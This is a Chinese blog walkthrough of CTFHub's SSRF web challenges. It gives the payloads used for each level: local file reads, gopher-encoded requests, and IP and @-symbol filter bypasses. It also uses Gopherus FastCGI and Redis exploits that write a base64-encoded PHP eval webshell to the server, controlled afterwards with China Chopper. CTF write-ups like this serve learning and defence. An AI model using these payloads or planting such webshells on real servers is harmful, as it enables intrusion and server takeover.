CTFHub技能书——web-SSRF篇通关攻略

最新推荐文章于 2024-08-02 13:35:44 发布
最新推荐文章于 2024-08-02 13:35:44 发布
阅读量940 收藏 12
点赞数 28
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a96482/article/details/140675328
版权

一、内网访问

根据提示直接在网址后面跟上

/?url=http://127.0.0.1/flag.php

二、伪协议读取文件

直接在网址后跟

/?url=file:///var/www/html/flag.php

我们发现界面没有显示flag,查看页面源代码

三、端口扫描

/?url=http://127.0.0.1:?/flag.php

根据提示端口号在8000-9000之间,我们不可能一个个试,这时候需要工具来帮助。

开启环境之后,直接使用burpsuite的狙击手模式直接开始爆破

设置变量的类型(Numbers)和范围(8000-9000)

之后访问端口便可获得flag或者直接在工具的响应中得到。

四、POST请求

输入key后直接抓包

将数据修改至上述几行然后进行url编码(进行两次)目的是为了浏览器成功解析。

中途需要替换

再次进行url编码

将得到的编码加入网址后(注意使用gopher协议,端口号后加"_"下划线)

五、上传文件

我们进入flag.php中发现没有提交按钮,我们进入控制台,自己添加提交按钮。

文件选择小一点的,防止出错,点击提交抓包。

注意中文可能乱码,将包里的内容修改成以下行。

接下来与POST提交一致,进行二次编码。

进行替换

二次编码

然后将得到的编码加入网址后得到flag

六、FastCGI协议

本题我们需要Gopherus工具帮助,我们把工具下载至虚拟机中

下载地址:https://github.com/tarunkant/Gopherus.git

插入一个木马以获得用户文件操作权限。

python gopherus.py --exploit fastcgi
/var/www/html/index.php                 # 这里输入的是一个已知存在的php文件
echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4 | base64 -d > /var/www/html/shell.php

需要将生成的进行一次编码,因为get本身会进行一次url解码

然后访问,和上传文件的方式一样,当显示以下页面,则证明木马插入成功。

然后用中国菜刀(Web Shell)工具,连接获得

七、Redis协议

操作流程与FastCGI协议一样,代码略有不同。详见下图

进行编码

访问网址,进行木马的植入。可能是redis协议的原因,会加载至超时。

这时直接访问shell.php,发现木马植入成功。

使用菜刀访问,得到flag

八、URL Bypass

构造urlbypass payload

利用@符号绕过

?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

九、数字IP Bypass

十六进制 = 7F000001
二进制 = 1111111000000000000000000000001

127.0.0.1=localhost

十、302跳转 Bypass

进制转换   16进制  2进制(会被检测)
?url=0x7F000001/flag.php
?url=http://0x7F000001/flag.php
其他代表127.0.0.1地址符号的  localhost  0  
localhos在IPV4中被指向127.0.0.1 
?url=localhost/flag.php
?url=http://localhost/flag.php
?url=0/flag.php
?url=http://0/flag.php

参考关于localhost,0.0.0.0及127.0.0.1的区别

十一、 DNS重绑定 Bypass

根据关卡提示这是一个测试dns重绑定漏洞的网站,可以让一个域名随机的绑定两个IP

一个127.0.0.1,一个其他的ip(能访问就行,我设置的是该关卡自己的本地服务器ip)

访问获得flag

一同吃泥
关注
  • 28
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
WEB CTF备忘单 目录 MySQL 微软SQL Oracle SQLite的 PostgreSQL MS Access LFI 上载 序列化 PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony ...
uptime-checks-ssrf
04-06
这是视频,介绍在那里发现的31,000美元盲SSRF的理论:该实验室只是一个模拟,它使您可以尝试使用视频中介绍的盲目数据泄露的先进技术来尝试编写利用程序的技能。 有一个公开的服务可以模拟GCP控制台的“正常运行...
CTFHub-技能树-Web-SSRF
MCTSOG的博客
04-18 1033
CTFHub技能树-web-ssrf
CTFHUB 技能树---SSRF全系列通关合集
qq_48368964的博客
07-24 1229
根据题目意思,让我们如访问内网的flag.php。
CTFHUB技能树——SSRF(一)
2401_82985722的博客
05-21 1290
大多是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。(7)从URL关键字中寻找(share、wap、url、link、src、source、target、u、display、sourceURl、imageURL、domain)(1)可以对外网、内网、本地进行端口扫描,某些情况下端口的Banner会回显出来(比如3306的);(5)使用file:///协议读取本地文件(或其他协议)
CTFHub技能Web-SSRF 302跳转 Bypass
Senimo
07-05 3448
CTFHub技能Web-SSRF 302跳转 Bypass hint:SSRF中有个很重要的一点是请求可能会跟随302跳转,尝试利用这个来绕过对IP的检测访问到位于127.0.0.1的flag.php吧 启动环境,依然为空白界面,查看URL: http://challenge-722b117ccdc24f8e.sandbox.ctfhub.com:10800/?url=_ 其中有通过GET传参的url,尝试访问127.0.0.1/flag.php页面: 提示:不允许企业内部IP访问,使用file协议
CTFHUB--技能树--SSRF全解(上
errorr0
05-11 2196
SSRF技能
CTFHub技能Web-SSRF(保姆级通过教程)
weixin_45808483的博客
11-10 5348
第一部分(Http、Dict和file等协议的利用) 内网访问 尝试访问位于127.0.0.1的flag.php吧 我们是从目标主机内网环境访问它本地的flag.php,我们构建url: /?url=http://127.0.0.1/flag.php 图中我们可以看出访问成功了。 为协议读取文件 尝试去读取一下Web目录下的flag.php吧 我们尝试直接访问,发现访问不到。 既然是伪协议访问,我们先了解一下url伪协议: 类型 file:/// dict..
题解记录-CTFHub技能树|Web|SSRF
weixin_57448435的博客
09-15 2255
ssrf
CTFHub技能解题笔记-SSRF-SSRF
qq_43006864的博客
04-07 2182
打开题目,提示我们尝试访问位于127.0.0.1的flag.php吧。那就是flag再127.0.0.1这个ip的目录下。会不会是XFF? 访问链接发现主页为空,抓包看看, 然后添加XFF。貌似毫无反应。 再仔细看链接 后缀是?url=_。会不会是在后面接上127.0.0.1/flag.php呢。 试试 拿到flag。 ...
CTFHub技能Web-SSRF 数字IP Bypass
Senimo
07-01 661
CTFHub技能Web-SSRF 数字IP Bypass hint:这次ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1。该怎么办呢 启动环境,页面为空白,查看URL: http://challenge-1c640dd5655b47b9.sandbox.ctfhub.com:10800/?url=_ 根据提示,不能使用点分十进制,尝试将127.0.0.1转换为十六进制形式,也就是0x7f000001 构造题目有所需 Payload:?url=0x7f000001/
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
104-web漏洞挖掘之SSRF漏洞1
08-03
SSRF(Server-Side Request Forgery)漏洞是网络安全领域中的一种常见问题,它允许攻击者通过构造特定的请求,使得服务器端发起恶意的外部请求。SSRF漏洞的本质是利用服务器作为一个代理,攻击者可以借此访问那些仅...
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
前端Web-JavaScript(上)
Yu2uki的博客
07-31 1416
JavaScript(简称:JS) 是一门跨平台、面向对象的脚本语言,是用来控制网页行为的,实现人机交互效果。JavaScript 和 Java 是完全不同的语言,不论是概念还是设计。但是基础语法类似。组成:ECMAScript: 规定了JS基础语法核心知识,包括变量、数据类型、流程控制、函数、对象等。BOM:浏览器对象模型,用于操作浏览器本身,如:页面弹窗、地址栏操作、关闭窗口等。DOM:文档对象模型,用于操作HTML文档,如:改变标签内的内容、改变标签内字体样式等。
高德地图离线版 使用高德地图api的方法
最新发布
m0_62336925的博客
08-02 326
然因为高德地图的瓦片地图太大,所以要让后端部署下 前端直接调用 如果本地 直接找到瓦片图路径就可以。这个代码把你想用的方法名保存到本地。这个时候会报错 因为没有这个方法。然后就可以正常使用这个方法拉。然后使用他的离线方法。找到对应的名字 复制。
【分享】前端程序员-技术网站推荐
一位前行者的博客
07-30 897
对于前端开发人员来说,以下是一些推荐的技术网站,这些网站提供了丰富的资源和知识,可以帮助你提升前端开发技能:收集一些 、、 的网站 vite 官方中文文档 element-plus 官方中文文档 pinia 官方中文文档 vue-router 官方中文文档 Tailwind CSS 官方文档 vitest 官方中文文档 es6 中文文档 axios 官方中文文档 vxetable 官方中文文档 lodash 中文文档 echarts 官方中文文档 animat
前端面试:项目细节重难点问题分享(十四)
weixin_49062485的博客
08-02 385
更多详情:爱米的前端小笔记(csdn~xitujuejin~zhiHu~Baidu~小红shu)同步更新,等你来看!都是利用下班时间整理的,整理不易,大家多多👍💛➕🤔哦!你们的支持才是我不断更新的动力!
ctfhub web技能树302跳转
07-28
CTFHubWeb技能树中,302跳转是一种常见的技术。根据引用\[1\],302跳转继承了HTTP 1.0中302的实现,即无论原请求是GET还是POST,都可以自动进行重定向。而根据引用\[2\],在使用curl命令进行下载时,可以通过参数-C -实现断点续传,即在下载过程中按Ctrl + C停止下载,下次可以接着上次的进度继续下载。这样可以节省时间,避免重复下载已经下载过的部分。 在某些情况下,302跳转可能会受到黑名单的限制。根据引用\[3\],黑名单可能限制了特定的网段,如127、172、10、192网段。然而,可以通过使用localhost的方式绕过这些限制。例如,将http://127.0.0.1/flag.php转换为短网址,并构造Payload发送请求,利用302跳转可以获取到flag。 总结来说,302跳转是一种常见的Web技术,可以用于重定向请求。在CTFHubWeb技能树中,了解如何使用302跳转以及如何绕过黑名单限制是很重要的。 #### 引用[.reference_title] - *1* *2* [2.CTFhub技能web前置技能 http协议 302跳转](https://blog.csdn.net/FFFFFFMVPhat/article/details/121342556)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能Web-SSRF 302跳转 Bypass](https://blog.csdn.net/weixin_44037296/article/details/118482943)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值